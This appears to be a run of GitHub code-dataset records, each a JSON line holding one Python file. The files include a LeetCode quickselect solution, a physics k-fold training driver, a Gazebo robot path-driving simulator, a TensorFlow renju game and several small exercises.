\"\"\" forward all events to the player \"\"\"\r\n if event.type == pygame.KEYDOWN:\r\n self.gsobj.forward_keydown(event.key)\r\n elif event.type == pygame.KEYUP:\r\n self.gsobj.forward_keyup(event.key)\r\n\r\n def draw_main(self):\r\n \"\"\" needed to become a valid game state \"\"\"\r\n pass\r\n\r\n def reset(self):\r\n \"\"\" reset the transition \"\"\"\r\n self.done = False\r\n\r\n self.hold_cou = 0\r\n\r\n","repo_name":"ColtonUnruh/Pyformer","sub_path":"source_code/pymphony/cutscene/cutscene.py","file_name":"cutscene.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17787749981","text":"from typing import List\n\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n def Paritition(kvList, left, right):\n temp = kvList[left]\n while left < right:\n # 从右往左找比temp小的\n while left < right and kvList[right][1] >= temp[1]:\n right -= 1\n kvList[left] = kvList[right]\n while left < right and kvList[left][1] <= temp[1]:\n left += 1\n kvList[right] = kvList[left]\n # 把temp数据放入最终空出的坑中\n kvList[left] = temp\n return left\n\n def quickSort(kvList, left, right):\n if left < right:\n index = Paritition(kvList, left, right)\n if index > k:\n quickSort(kvList, left, index - 1)\n elif index < k:\n quickSort(kvList, index + 1, right)\n else:\n return\n\n\n # 用快速排序试试\n map = {}\n for i in nums:\n if i in map:\n map[i] += 1\n else:\n map[i] = 1\n kvList = []\n for key, value in map.items():\n kvList.append((key, value))\n\n if len(kvList) == 1:\n return [kvList[0][0]]\n\n quickSort(kvList, 0, len(kvList)-1)\n kvList.reverse()\n return [_[0] for _ in kvList[:k]]\n\n # quickSort(nums, 0, left)\n # quickSort(nums, left+1, len(nums)-1)\n # quickSort(nums, 0, len(nums)-1)\n # print(nums)\n\nif __name__ == '__main__':\n print(Solution().topKFrequent(nums = [5,-3,9,1,7,7,9,10,2,2,10,10,3,-1,3,7,-9,-1,3,3], k = 3))","repo_name":"Witness521/leetcode","sub_path":"HOT100/快速排序.py","file_name":"快速排序.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38990138990","text":"from recordtype import recordtype\nimport pathlib\nimport os\nimport numpy as np\nimport argparse\n\nimport dadrah.kfold_pipeline.kfold_training as ktrain\nimport dadrah.kfold_pipeline.kfold_envelope as kenlo\nimport dadrah.kfold_pipeline.kfold_poly_fitting as kpofi\nimport dadrah.kfold_pipeline.kfold_prediction as kpred\nimport dadrah.kfold_pipeline.kfold_string_constants as kstco\nimport dadrah.kfold_pipeline.kfold_util as kutil\nimport dadrah.util.logging as log\n\n\n# ******************************************** #\n# main #\n# ******************************************** #\n\n\nif __name__ == '__main__':\n\n # command line\n parser = argparse.ArgumentParser(description='read arguments for k-fold QR training')\n parser.add_argument('-r', dest='qr_run_n', type=int, help='experiment run number')\n # qr hyperparams\n parser.add_argument('-ln', dest='layers_n', type=int, help='number of layers')\n parser.add_argument('-nn', dest='nodes_n', type=int, help='number of nodes')\n parser.add_argument('-bn', dest='batch_sz', type=int, help='batch size')\n parser.add_argument('-lr', dest='lr', type=float, help='learning rate')\n parser.add_argument('-ac', dest='acti', type=str, help='activation function')\n parser.add_argument('-in', dest='initial', choices=['he','glorot'], help='weight initializer')\n # samples\n parser.add_argument('-read', dest='read_n', type=int, help='number of samples to read')\n # envelope and polynomials run n\n parser.add_argument('-en', dest='env_run_n', type=int, help='envelope number (f of bins)', default=0)\n parser.add_argument('-pn', dest='poly_run_n', type=int, help='polyfit number (f of order)', default=0)\n # loading options\n parser.add_argument('--loadqr', dest='train_models', action=\"store_false\", help='load previously trained qr models')\n parser.add_argument('--loadenv', dest='calc_envelope', action=\"store_false\", help='load previously calulated envelope')\n parser.add_argument('--loadpoly', dest='fit_polynomials', action=\"store_false\", help='load previously fitted polynomials')\n # binning options\n parser.add_argument('-bi', dest='binning', choices=['linear', 'expo', 'dijet'], help='binning basis for envelope', default='dijet')\n parser.add_argument('-bis', dest='bin_start', type=int, help='index of first bin')\n parser.add_argument('-bin', dest='n_bins', type=int, help='total number of bins')\n parser.add_argument('-bimi', dest='min_mjj', type=float, help='maximal mjj')\n parser.add_argument('-bima', dest='max_mjj', type=float, help='minimal mjj')\n parser.add_argument('--bie', dest='bin_centers', action='store_false')\n # signal injection\n parser.add_argument('-xs', dest='sig_xsec', type=int, help='signal injection rate [femtobarn]', default='0')\n parser.add_argument('-siid', dest='sig_sample_id', choices=['GtoWW15na', 'GtoWW25na', 'GtoWW35na', 'GtoWW45na', 'GtoWW15br', 'GtoWW25br'], default='GtoWW35na')\n\n args = parser.parse_args()\n # optional binning kwargs\n kwargs_bins = {k:v for k,v in vars(args).items() if k in ['bin_start','bin_centers','n_bins','min_mjj','max_mjj'] and v is not None} \n\n # logging\n logger = log.get_logger(__name__)\n logger.info('\\n'+'*'*60+'\\n'+'\\t\\t\\t PREDICTION RUN \\n'+str(args)+'\\n'+'*'*60)\n\n\n # fixed \n Parameters = recordtype('Parameters','qr_run_n, kfold_n, quantiles, qcd_sample_id, sig_sample_id, sig_xsec, score_strategy_id, read_n, layers_n, nodes_n, batch_sz, acti, initial, lr, epochs, optimizer, reg_coeff, env_run_n, binning, poly_run_n, poly_order')\n params = Parameters(qr_run_n=args.qr_run_n,\n kfold_n=5, \n quantiles=[0.3,0.5,0.7,0.9],\n qcd_sample_id='qcdSigAll', \n sig_sample_id=args.sig_sample_id+'Reco', \n sig_xsec=args.sig_xsec, \n score_strategy_id='rk5_05', \n read_n=args.read_n,\n layers_n=args.layers_n,\n nodes_n=args.nodes_n,\n batch_sz=args.batch_sz,\n acti=args.acti,\n initial=(args.initial+'_uniform' if args.initial is not None else None),\n lr=args.lr, \n epochs=50, \n optimizer='adam',\n reg_coeff=0., \n env_run_n=args.env_run_n, \n binning=args.binning, \n poly_run_n=args.poly_run_n, \n poly_order=11,\n )\n\n predict = True\n\n\n logger.info('\\n'+'*'*70+'\\n'+'\\t\\t\\t MAIN K-FOLD SCRIPT \\n'+str(params)+'\\n'+'*'*70)\n\n\n if args.train_models:\n\n # ****************************************************\n # train k models\n # ****************************************************\n\n logger.info('training QR model ' + str(args.qr_run_n))\n\n tb_base_dir = 'logs/tensorboard/' + str(args.qr_run_n)\n \n # models written to: /eos/home-k/kiwoznia/data/QR_models/vae_run_113/qr_run_$run_n_qr$\n # import ipdb; ipdb.set_trace()\n model_paths = ktrain.train_k_models(params, tb_base_dir)\n\n else:\n\n logger.info('loading QR model ' + str(args.qr_run_n))\n\n model_paths = kutil.get_model_paths(params)\n\n\n if args.calc_envelope:\n\n # ****************************************************\n # calculate cut envelope\n # ****************************************************\n\n\n ### bin edges\n # multiple binning options: dijet, linear, exponential\n bin_edges = kutil.get_bins(bin_type=params.binning, **kwargs_bins)\n logger.info('calculating envelope ' +str(params.env_run_n)+ ' with bins ' + ','.join(['{:.2f}'.format(b) for b in bin_edges]))\n\n envelope_path = kenlo.compute_kfold_envelope(params, model_paths, bin_edges)\n\n else:\n\n logger.info('loading envelope nr ' +str(params.env_run_n))\n envelope_path = kstco.get_envelope_dir(params) # load envelope path\n\n \n if args.fit_polynomials:\n\n # ****************************************************\n # fit polynomials\n # ****************************************************\n\n logger.info('fitting polynomials nr '+str(params.poly_run_n)+' of order '+str(params.poly_order))\n polynomial_paths = kpofi.fit_kfold_polynomials(params, envelope_path)\n\n else:\n logger.info('loading polynomials nr '+str(params.poly_run_n))\n polynomial_paths = kstco.get_polynomials_full_file_path(params)\n\n\n\n if predict:\n\n # ****************************************************\n # predict background and signal\n # ****************************************************\n\n selection_path = kpred.predict_with_polynomials(params, polynomial_paths)\n\n\n# end main \n\n","repo_name":"kingusiu/dadrah","sub_path":"main_kfold.py","file_name":"main_kfold.py","file_ext":"py","file_size_in_byte":6991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34342069082","text":"# E --> N\ndef e_n(n):\n return (n/2)\n\n# N --> Z\ndef n_z(n):\n if n == 1:\n return 0\n elif n%2 == 0:\n return n/2\n else:\n return (n-1)/(-2)\n\n# GCD\ndef gcd(m,n):\n if m%n == 0:\n return n \n else:\n return gcd(n, m%n)\n\n# N --> Q+\ndef n_q_prep(n):\n counter = 0\n layer = 0\n while counter < n:\n counter = counter + (layer + 1)\n layer += 1\n order = n - (counter - layer)\n if layer%2 != 0:\n p = (layer + 1 - order)\n q = order\n else:\n p = order\n q = (layer + 1 - order)\n return (p,q)\n\ndef n_q(n):\n counter = 0\n x = 1\n while counter < n:\n p = n_q_prep(x)[0]\n q = n_q_prep(x)[1]\n if gcd(p,q) == 1:\n x += 1\n counter += 1\n else:\n x += 1\n return p/q\n \n\n\n\n# Z --> Q\ndef z_q(n):\n if n == 0:\n return 0\n elif n > 0:\n return n_q(n)\n elif n < 0:\n return n_q((n*-1))*(-1)\n\n# E --> Q\ndef e_q(n):\n if n == 2:\n return 0\n elif (n/2)%2 != 0:\n return z_q((((n/2)-1)/2))\n else:\n return z_q(((n/2)/2)*(-1))\n\ndef e_q2(n):\n return z_q(n_z(e_n(n)))\n\n\n\nfor x in range(1,11):\n print(n_q(x))\n\n\n\n\n","repo_name":"michael940716/accelerated_cs","sub_path":"summer_2019/cs250/bijection.py","file_name":"bijection.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40848302146","text":"import csv\n\n\ndef main():\n\n ID_NUMBER_INDEX = 0\n NAME_INDEX = 1\n students_dict = read_dictionary(\"students.csv\", ID_NUMBER_INDEX)\n print(students_dict)\n\n id = input(\"Please enter an I-Number: \")\n \n\n\n if id in students_dict:\n value = students_dict[id]\n name = value[NAME_INDEX]\n print(name)\n else:\n print(\"No such student\")\n\n\ndef read_dictionary(filename, key_column_index):\n \"\"\"Read the contents of a CSV file into a compound\n dictionary and return the dictionary.\n\n Parameters\n filename: the name of the CSV file to read.\n key_column_index: the index of the column\n to use as the keys in the dictionary.\n Return: a compound dictionary that contains\n the contents of the CSV file.\n \"\"\"\n\n dictionary = {}\n with open(filename,\"rt\") as csv_file:\n\n # use csv module to create a reader object\n reader = csv.reader(csv_file)\n\n # Skip First row\n next(reader)\n\n # read rows one row at a time.\n for row_list in reader:\n # if data is not blank, add the data to the dictionary\n if len(row_list) != 0:\n # from current row, retrieve the data that contains key\n key = row_list[key_column_index]\n # store data from current row to the dictionary\n dictionary[key] = row_list\n\n return dictionary\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"loopera/Python-Programming-with-Functions","sub_path":"Week5/students.py","file_name":"students.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27734051883","text":"from sys import stdin\n\n\ndef parse_instruction(instruction_str):\n turn = -1 if instruction_str[0] == 'L' else 1\n walk = int(instruction_str[1:])\n return turn, walk\n\n\ndef main():\n instructions = [\n parse_instruction(s)\n for s in stdin.read().strip().split(', ')\n ]\n\n x, y = 0, 0\n dx, dy = 0, -1\n visited = {(0, 0)}\n\n for turn, walk in instructions:\n dx, dy = -turn * dy, turn * dx\n\n for _ in range(walk):\n x += dx\n y += dy\n\n if (x, y) in visited:\n print(abs(x) + abs(y))\n return\n\n visited.add((x, y))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"elemel/advent-of-code","sub_path":"python/2016/day_01/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13072064229","text":"\"\"\"\n\n\n\n__call__:\nزمانی این متود فعال می شه که ما یک آبجکت از کلاس رو بصورت یک فانکشن صدا بزنیم\nدر دیزاین پترن سینگلتون کاربرد دارد\n\n\n\n\"\"\"\n\n\n\nclass Person:\n \n def __call__(self, value, *args, **kwargs):\n print(value)\n\n\n\nperson_1 = Person()\nperson_1('Mahdi')","repo_name":"mahdi-zarepour/Python3","sub_path":"OOP/Advanced/__call__/__call__.py","file_name":"__call__.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14385211940","text":"from collections import Counter\nclass Solution(object):\n def kthDistinct(self, arr, k):\n count = Counter(arr).most_common()\n remove_set = []\n \n for i in count:\n if i[1] > 1:\n remove_set.append(i[0])\n \n answer = [i for i in arr if i not in remove_set]\n \n if len(answer) < k:\n return \"\"\n else:\n return answer[k-1]","repo_name":"qwas15788hj/LeetCode","sub_path":"2053-kth-distinct-string-in-an-array/2053-kth-distinct-string-in-an-array.py","file_name":"2053-kth-distinct-string-in-an-array.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28324046744","text":"import argparse\nimport serial\nimport datetime\nimport re\nimport time\nimport threading\nimport numpy as np\nimport zmq\nimport math\nfrom my_tools import *\n#script to simulate path driving, At each waypoint it aims itself at the next waypoint using the compass. \n#meant to work in conjunction with my_tools.py\n\n\n#current issue is that the critical phi is not being calculated correctly, somewhere near getCriticalAngle\n\n#connect to driver-to-gazebo.py interface\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP) \nsocket.bind(\"tcp://*:5557\")\nencoding = 'utf-8'\n\n\n#initialize wheels\nleftWheelPwr = 0.0\nrightWheelPwr = 0.0\n\n\n#knobs\nwheelStrength = 0.01 #constant to govern general wheel strength (set low because we multiply times delta theta)\nangleTolerance = 1 #how far off course (angularly) is ok\ndistanceTolerance = 1 #size of radius at which we count as reaching the waypoint\nforwardsPwm = 3.0 #another strength constant for wheel speed\nbackwardsPwm= 2.0 #this one matters because it could be pos/neg or 16/14 pwm\n#globals # I may want to add \"_global\" at the end of these\nthisLat = 0 #so that they are not confused/mixed up with \nthisLong = 0 #regular variables.\nlatitude = 0\nlongitude = 0\nthetaCoord = 0\nthisDirection = 0\nlastTheta = 999\nlastOmega = 0\nnumWp = 0\nturnR = 1.25 #turn radius (should probably be calculated based on w1, w2, and distance between wheels)\n#test motors\n\ndistance = 0\n\n\n\n \n\ndef driver(path):\n while True:\n doubleOrientDrive(path)\n\ndef compassOrientation(thetaGoal): #use compass to rotate\n global leftWheelPwr # We will set wheel power and just \n global rightWheelPwr \n leftWheelPwr = 0\n rightWheelPwr = 0\n time.sleep(5)\n kP = 0.01\n kD = 0.1\n thetaDiff = abs(thetaCoord - thetaGoal)\n lastTheta = thetaCoord\n while thetaDiff > angleTolerance: #pid loop\n direction = turnTable(thetaCoord,thetaGoal) #which direction to turn\n delta = deltaTheta(direction,thetaCoord,thetaGoal) #calculate how much more turning will be required\n dTheta = thetaCoord - lastTheta\n lastTheta = thetaCoord\n dE = kP*delta - kD*abs(dTheta)\n turnStrength = dE\n if direction > 0:\n leftWheelPwr = turnStrength\n rightWheelPwr = -turnStrength\n else:\n leftWheelPwr = -turnStrength\n rightWheelPwr = turnStrength\n thetaDiff = abs(thetaCoord - thetaGoal)\n time.sleep(0.01)\n leftWheelPwr = 0\n rightWheelPwr = 0\n time.sleep(5)\n\ndef gpsOrientation(thetaGoal): #use gps and gyroscope(compass for now)\n global leftWheelPwr\n global rightWheelPwr\n x1 = latitude\n y1 = longitude \n\n leftWheelPwr = forwardsPwm \n rightWheelPwr = forwardsPwm\n\n time.sleep(2)\n leftWheelPwr = 0\n rightWheelPwr = 0\n time.sleep(2)\n x2 = latitude\n y2 = longitude\n thetaHeading,distance = findBearing(x1,y1,x2,y2)\n direction = turnTable(thetaHeading,thetaGoal)\n compassError = deltaTheta(direction,thetaHeading,thetaGoal)\n if direction > 0: #need to check, might be backwards\n compassOrientation(thetaHeading - compassError)\n if direction < 0:\n compassOrientation(thetaHeading + compassError)\n leftWheelPwr = forwardsPwm\n rightWheelPwr = forwardsPwm\n\ndef doubleOrientDrive(path):\n global leftWheelPwr\n global rightWheelPwr\n lastWp = numWp\n thisY = longitude #translate lat/long to x/y for clarity\n thisX = latitude\n wpX,wpY = getPathPoint(path,numWp + 1)\n print(thisX,thisY,wpX,wpY)\n thetaGoal,distance = findBearing(thisX,thisY,wpX,wpY)\n compassOrientation(thetaGoal) #thetaGoal is the compass angle\n # leftWheelPwr = forwardsPwm\n # rightWheelPwr = forwardsPwm\n gpsOrientation(thetaGoal)\n while (lastWp == numWp): #if the waypoint hasn't changed, keep going\n time.sleep(0.01)\n\n\n\ndef rpServer(): #constantly be communicating with locator\n global latitude #whether it is the arduino giving it gps coordinates from the ublox\n global longitude #or simulated coordinates from gazebo\n global thetaCoord\n while True:\n response = str(leftWheelPwr) + \" \" + str(rightWheelPwr)\n message = socket.recv()\n socket.send(response.encode(encoding))\n alphabet = message.decode(encoding)\n data = re.split(' ',alphabet)\n latitude = float(data[0]) \n longitude = float(data[1]) \n thetaCoord = (-(float(data[2])) + 90)%360\n\n\ndef numWpUpdate(path): #function which is constantly checking to see if numWp has been reached and needs to be updated\n global numWp #important parameter to export\n numWp = 0\n lastD = 1e9 #initialize\n while(True): #check waypoints\n thisY = longitude #standard long -> Y\n thisX = latitude #lat -> X (maybe should have been backwards\n nX,nY = getPathPoint(path,numWp + 1) #get position of the next path point\n numD = getEuclidean(thisX,thisY,nX,nY) #get distance to the next path point\n if numD > lastD and numD < distanceTolerance: #if I stopped getting closer to the wp, its time to update\n numWp = numWp + 1\n lastD = numD\n\ndef driveLoop(path,finalLat,finalLong,firstRun): #starts driving/locator threads and checks for completion\n \n if (firstRun == True): #on first run, activate the connection to the locator\n gpsChecker = threading.Thread(target=rpServer) \n gpsChecker.daemon = True\n gpsChecker.start()\n\n pointsChecker = threading.Thread(target=numWpUpdate,args=(path, ))\n pointsChecker.daemon = True\n pointsChecker.start()\n\n\n driveChecker = threading.Thread(target=driver,args=(path,)) \n driveChecker.daemon = True\n driveChecker.start()\n while True: \n time.sleep(5)\n\n\n\n\npath = np.loadtxt('finalPath.txt')\n\n\n#driveLoop(path[0],path[1],True) #actual first step\ndriveLoop(path,0,0,True) #for display purposes\n\n\n\n","repo_name":"skywo1f/electronic-differential","sub_path":"gazebo-simulator/build/SP6.py","file_name":"SP6.py","file_ext":"py","file_size_in_byte":7741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32702933726","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow.contrib import predictor\nfrom numpy import unravel_index\nimport time\n\n\ntable = np.zeros([15, 15, 3], dtype=np.float32)\n\nW_conv = tf.get_variable(\"W_conv\", shape=[5, 5, 1, 20])\n\nsess = tf.Session()\nsaver = tf.train.import_meta_graph('./test_model-17.meta')\nsaver.restore(sess, tf.train.latest_checkpoint('./', latest_filename=\"checkpointUchiha\"))\n\n\n\n\ndef sorted_idx_possible(preds, cur_WIDTH, table):\n\tpredstr = np.copy(np.reshape(preds, (225)))\n\tidx = np.argsort(-predstr)\n\tmaxidx = np.empty([cur_WIDTH, 2], dtype = np.int32)\n\tcnt = 0\n\tpos = 0\n\tprobabilities = np.empty((cur_WIDTH), dtype=np.float32)\n\n\twhile cnt < cur_WIDTH:\n\t\twhile pos < 225 and not (table[idx[pos] // 15, idx[pos] % 15, 0] == 0 and table[idx[pos] // 15, idx[pos] % 15, 1] == 0):\n\t\t\tpos += 1\n\n\t\tif pos == 225:\n\t\t\tprint(table[:,:,0])\n\t\t\tprint(table[:,:,1])\n\n\t\tmaxidx[cnt, 0] = idx[pos] // 15\n\t\tmaxidx[cnt, 1] = idx[pos] % 15\n\t\tprobabilities[cnt] = predstr[idx[pos]]\n\t\tcnt += 1\n\t\tpos += 1\n\n\treturn maxidx, probabilities\n\n\n\n\ndef check_win():\n\tfor i in range(11):\n\t\tfor j in range(15):\n\t\t\tsum = np.sum(table[i:i+5, j, 0])\n\t\t\tif sum == 5:\n\t\t\t\treturn 1\n\t\t\tsum = np.sum(table[i:i+5, j, 1])\n\t\t\tif sum == 5:\n\t\t\t\treturn -1\n\n\tfor i in range(15):\n\t\tfor j in range(11):\n\t\t\tsum = np.sum(table[i, j:j+5, 0])\n\t\t\tif sum == 5:\n\t\t\t\treturn 1\n\t\t\tsum = np.sum(table[i, j:j+5, 1])\n\t\t\tif sum == 5:\n\t\t\t\treturn -1\n\n\tfor i in range(11):\n\t\tfor j in range(11):\n\t\t\tsum = 0\n\t\t\tfor k in range(5):\n\t\t\t\tsum += table[i + k, j + k, 0]\n\t\t\tif sum == 5:\n\t\t\t\treturn 1\n\t\t\tsum = 0\n\t\t\tfor k in range(5):\n\t\t\t\tsum += table[i + k, j + k, 1]\n\t\t\tif sum == 5:\n\t\t\t\treturn -1\n\n\tfor i in range(4, 15):\n\t\tfor j in range(11):\n\t\t\tsum = 0\n\t\t\tfor k in range(5):\n\t\t\t\tsum += table[i - k, j + k, 0]\n\t\t\tif sum == 5:\n\t\t\t\treturn 1\n\t\t\tsum = 0\n\t\t\tfor k in range(5):\n\t\t\t\tsum += table[i - k, j + k, 1]\n\t\t\tif sum == 5:\n\t\t\t\treturn -1\n\n\treturn 0\n\nletters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o']\n\ndef print_board():\n\tprint()\n\tprint(\" 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15\")\n\tfor i in range(15):\n\t\tprint(letters[i], end=\" \")\n\t\tfor j in range(15):\n\t\t\tif table[i, j, 0] == 0 and table[i, j, 1] == 0:\n\t\t\t\tprint('. ', end=\" \")\n\t\t\telif table[i, j, 0] == 1:\n\t\t\t\tprint('X ', end=\" \")\n\t\t\telse:\n\t\t\t\tprint('O ', end=\" \")\n\t\tprint()\n\tprint()\n\n\nprediction_raw = tf.get_default_graph().get_tensor_by_name(name=\"my_prediction:0\")\nprediction = tf.reshape(tf.nn.softmax(prediction_raw), [-1, 15 * 15])\n\n\nprint(\"choose your side\")\nside = input()\n\nif (side == \"black\" or side == \"b\" or side == \"B\" or side == \"1\" or side == \"b_term\"):\n\n\tstep = 1\n\tx_tens = tf.get_default_graph().get_tensor_by_name(name=\"x:0\")\n\n\tif (side != \"b_term\"):\n\t\tprint(\"you play for black\")\n\n\twhile check_win() == 0:\n\n\t\tif (side != \"b_term\"):\n\t\t\tprint_board()\n\n\t\tif (step % 2 == 1):\n\t\t\tif (side != \"b_term\"):\n\t\t\t\tprint(\"your turn\")\n\n\t\t\tx_char = input()\n\t\t\tx = ord(x_char[0]) - ord('a')\n\t\t\ty = int(x_char[1:])\n\t\t\ty -= 1\n\t\t\tif x < 0 or x >= 15 or y < 0 or y >= 15 or table[x, y, 0] != 0:\n\t\t\t\tprint(\"invalid step\\n\")\n\t\t\t\tcontinue\n\t\t\ttable[x, y, 0] = 1\n\t\t\t\n\t\telse:\n\t\t\tpred_np = np.empty((15, 15))\n\t\t\ttime00 = time.time()\n\t\t\tpred_np = sess.run(prediction, feed_dict={x_tens: np.reshape(table, (1, 15, 15, 3))})\n\t\t\tpred_np = np.reshape(pred_np, [15, 15])\n\t\t\tprint(pred_np)\n\t\t\tmax_i = -1\n\t\t\tmax_j = -1\n\t\t\tfor i in range(15):\n\t\t\t\tfor j in range(15):\n\t\t\t\t\tif (max_i == -1 and table[i, j, 1] == 0 and table[i, j, 0] == 0) or \\\n\t\t\t\t\t\t\t\t(max_i != -1 and table[i, j, 1] == 0 and table[i, j, 0] == 0 and pred_np[i, j] > pred_np[max_i, max_j]):\n\t\t\t\t\t\t\t\tmax_i = i\n\t\t\t\t\t\t\t\tmax_j = j\n\n\t\t\tif (side != \"b_term\"):\n\t\t\t\tprint(\"enemy: \", end=\"\")\n\t\t\tprint(letters[max_i], max_j + 1)\n\t\t\t\n\t\t\ttable[max_i, max_j, 1] = 1\n\n\t\tstep += 1\n\n\tprint_board()\n\tif check_win() == 1:\n\t\tprint(\"YOU WIN\")\n\t\texit(1)\n\telse:\n\t\tprint(\"YOU LOSE\")\n\t\texit(2)\nelse:\n\tstep = 0\n\tx_tens = tf.get_default_graph().get_tensor_by_name(name=\"x:0\")\n\ttable[:,:,2] = np.ones((15, 15))\n\n\tif (side != \"w_term\"):\n\t\tprint(\"you play for white\")\n\n\twhile check_win() == 0:\n\n\t\tprint_board()\n\t\tif (step % 2 == 1):\n\t\t\tif (side != \"w_term\"):\n\t\t\t\tprint(\"your turn\")\n\n\t\t\tx_char = input()\n\t\t\tx = ord(x_char[0]) - ord('a')\n\t\t\ty = int(x_char[1:])\n\t\t\ty -= 1\n\t\t\tif x < 0 or x >= 15 or y < 0 or y >= 15 or table[x, y, 0] != 0:\n\t\t\t\tprint(\"invalid step\\n\")\n\t\t\t\tcontinue\n\t\t\ttable[x, y, 1] = 1\n\t\t\t\n\t\telse:\n\t\t\tpred_np = np.empty((15, 15))\n\t\t\tpred_np = np.reshape(sess.run(prediction, feed_dict={x_tens: np.reshape(table, (1, 15, 15, 3))}), (15, 15))\n\t\t\tprint(pred_np)\n\n\t\t\tpossible_turn, probabilities = sorted_idx_possible(pred_np, 4, table)\n\t\t\tpos = np.random.choice(4, p=(probabilities / np.sum(probabilities)))\n\t\t\tstep_i = possible_turn[pos, 0]\n\t\t\tstep_j = possible_turn[pos, 1]\n\t\t\tprint(possible_turn)\n\t\t\tprint(probabilities)\n\t\t\tprint(\"i would chose\", step_i, step_j)\n\t\t\tprint()\n\n\n\t\t\tmax_i = -1\n\t\t\tmax_j = -1\n\t\t\tfor i in range(15):\n\t\t\t\tfor j in range(15):\n\t\t\t\t\tif (max_i == -1 and table[i, j, 1] == 0 and table[i, j, 0] == 0) or \\\n\t\t\t\t\t\t\t\t(max_i != -1 and table[i, j, 1] == 0 and table[i, j, 0] == 0 and pred_np[i, j] > pred_np[max_i, max_j]):\n\t\t\t\t\t\t\t\tmax_i = i\n\t\t\t\t\t\t\t\tmax_j = j\n\t\t\t\n\t\t\tif (side != \"w_term\"):\n\t\t\t\tprint(\"enemy: \", end=\"\")\n\t\t\tprint(letters[max_i], max_j + 1)\n\t\t\t\n\t\t\ttable[max_i, max_j, 0] = 1\n\n\t\tstep += 1\n\n\tprint_board()\n\tif check_win() == -1:\n\t\tprint(\"YOU WIN\")\n\t\texit(1)\n\telse:\n\t\tprint(\"YOU LOSE\")\n\t\texit(2)\n\n","repo_name":"Quid37/renju_project","sub_path":"renju/run_game_vs_player.py","file_name":"run_game_vs_player.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"771299486","text":"msg = input('Сообщение: ')\nres = list()\ni = 0\nwhile i != len(msg):\n cache = list()\n if msg[i].isalpha():\n start_index = i\n while True:\n if i + 1 < len(msg) and msg[i+1].isalpha():\n i += 1\n else:\n cache.append(msg[i:start_index:-1] + msg[start_index])\n res.append(cache[0])\n break\n else:\n res.append(msg[i])\n i += 1\nprint(''.join(res))\n","repo_name":"thekiralog/skillbox_copied","sub_path":"Module18/09_message/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"te","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42573996324","text":"import numpy as np\n\n\n\ndef check_input(A: np.ndarray, \n blocksize: int, \n comm_size: int):\n \"\"\" Check the validity of the inputs parameters.\n\n Parameters\n ----------\n A : numpy matrix\n matrix to invert\n blocksize : int\n size of a block\n comm_size : int\n number of processes\n\n Returns\n -------\n None\n\n Raises\n ------\n ValueError\n The matrix size must be a multiple of the blocksize.\n ValueError\n The blocksize must be smaller than the matrix size.\n ValueError\n The blocksize must be greater than 0.\n ValueError\n The number of blocks must be greater than the number of processes.\n \"\"\"\n \n if A.shape[0] % blocksize != 0:\n raise ValueError(\"The matrix size must be a multiple of the blocksize.\")\n \n if blocksize > A.shape[0]:\n raise ValueError(\"The blocksize must be smaller than the matrix size.\")\n \n if blocksize < 1:\n raise ValueError(\"The blocksize must be greater than 0.\")\n \n nblocks = A.shape[0] // blocksize\n if nblocks < 3*comm_size:\n raise ValueError(\"The number of blocks is to low. There should be at least 3 blockrows per process\")\n # Central processes need at least 3 (block) rows to work.\n \n \n \n \ndef divide_matrix(A: np.ndarray, \n n_partitions: int, \n blocksize: int) -> [list, list]:\n \"\"\" Compute the n_partitions segments that divide the matrix A.\n\n Parameters\n ----------\n A : numpy matrix \n matrix to divide\n n_partitions : int\n number of partitions\n blocksize : int\n size of a block\n\n Returns\n -------\n l_start_blockrow : list\n list of processes starting block index\n l_partitions_blocksizes : list\n list of processes partition size\n \"\"\"\n\n nblocks = A.shape[0] // blocksize\n partition_blocksize = nblocks // n_partitions\n blocksize_of_first_partition = nblocks - partition_blocksize * (n_partitions-1)\n\n # Compute the starting block row and the partition size for each process\n l_start_blockrow = []\n l_partitions_blocksizes = []\n\n for i in range(n_partitions):\n if i == 0:\n l_start_blockrow = [0]\n l_partitions_blocksizes = [blocksize_of_first_partition]\n else:\n l_start_blockrow.append(l_start_blockrow[i-1] + l_partitions_blocksizes[i-1])\n l_partitions_blocksizes.append(partition_blocksize)\n\n return l_start_blockrow, l_partitions_blocksizes\n\n","repo_name":"Nano-TCAD/SINV","sub_path":"src/sinv/algorithms/psr/psr_utils.py","file_name":"psr_utils.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"38701929623","text":"# Rock-paper-scissors-lizard-Spock template\n\n\n# The key idea of this program is to equate the strings\n# \"rock\", \"paper\", \"scissors\", \"lizard\", \"Spock\" to 